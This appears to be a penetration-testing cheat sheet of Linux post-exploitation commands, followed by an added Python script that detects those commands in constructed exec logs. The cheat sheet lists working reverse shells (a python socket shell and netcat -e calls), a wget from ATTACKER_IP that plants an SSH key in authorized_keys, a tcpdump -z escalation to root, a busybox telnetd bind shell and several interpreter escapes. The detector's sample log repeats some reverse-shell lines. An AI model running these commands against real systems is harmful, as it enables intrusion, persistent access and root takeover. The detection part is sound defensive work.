Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH, TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash
Add public key to authorized keys:
$ echo $(wget -qO- https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys
Escaping limited interpreters
Some payloads to overcome limited shells:
$ ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
$ echo os.system('/bin/bash')
$ /bin/sh -i
$ exec "/bin/sh";
$ perl -e 'exec "/bin/sh";'
From within tcpdump
$ echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
From busybox
$ /bin/busybox telnetd -l /bin/sh -p 9999
:!bash
:set shell=/bin/bash:shell
!bash
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
awk 'BEGIN {system("/bin/bash")}'
--interactive
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'
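The commands above are also what a defender expects to see in process-execution logs after a compromise. The following is an added example (not part of the original cheat sheet) that matches the shell-upgrade, reverse-shell, tcpdump -z, busybox telnetd, authorized_keys and interpreter-escape patterns from this page against constructed exec-log lines; the log format (`timestamp uid=N cmd=...`), the sample commands and the 192.0.2.5 address are assumptions made for the example.

```python
import re

# Detection rules: (label, regex over the executed command line).
# Each pattern corresponds to a command family listed on this page.
RULES = [
    ("python pty upgrade", re.compile(r"pty\.spawn\(")),
    ("python reverse shell", re.compile(r"socket\.socket\(.*dup2\(")),
    ("netcat -e shell", re.compile(r"\b(nc|netcat|ncat)\b.*\s-e\s+/bin/(ba)?sh")),
    ("tcpdump -z postrotate", re.compile(r"\btcpdump\b.*\s-z\s+\S+")),
    ("busybox telnetd bind shell", re.compile(r"\bbusybox\s+telnetd\b")),
    ("authorized_keys append", re.compile(r">>\s*\S*authorized_keys")),
    ("interpreter system() escape",
     re.compile(r"\b(awk|perl|python|lua)\b.*(system|exec|execute)\s*[(\"]")),
]

# Constructed exec-log format: "<timestamp> uid=<uid> cmd=<command line>".
LINE_RX = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+cmd=(?P<cmd>.*)$")


def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Parse exec-log lines; return (timestamp, uid, labels) for each hit."""
    hits = []
    for line in lines:
        m = LINE_RX.match(line.strip())
        if not m:
            continue  # malformed line, skip rather than crash
        labels = classify(m["cmd"])
        if labels:
            hits.append((m["ts"], int(m["uid"]), labels))
    return hits


# Constructed sample log: attacker-style commands mixed with benign ones.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z uid=33 cmd=python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "2024-05-01T10:00:02Z uid=33 cmd=/bin/netcat 192.0.2.5 443 -e /bin/bash",
    "2024-05-01T10:00:03Z uid=33 cmd=sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root",
    "2024-05-01T10:00:04Z uid=0 cmd=tcpdump -i eth0 -w /tmp/capture.pcap",
    "2024-05-01T10:00:05Z uid=1000 cmd=echo ssh-rsa AAAA... >> ~/.ssh/authorized_keys",
    "2024-05-01T10:00:06Z uid=33 cmd=awk 'BEGIN {system(\"/bin/bash\")}'",
    "2024-05-01T10:00:07Z uid=1000 cmd=python -c 'print(1+1)'",
    "2024-05-01T10:00:08Z uid=33 cmd=python -c 'import socket,os;s=socket.socket();s.connect((\"192.0.2.5\",1234));os.dup2(s.fileno(),0)'",
]

if __name__ == "__main__":
    for ts, uid, labels in scan(SAMPLE_LOG):
        print(ts, uid, ", ".join(labels))
```

A plain `tcpdump -w` by root is not flagged; only the `-z` post-rotate command is, which is the part that hands execution to an arbitrary script.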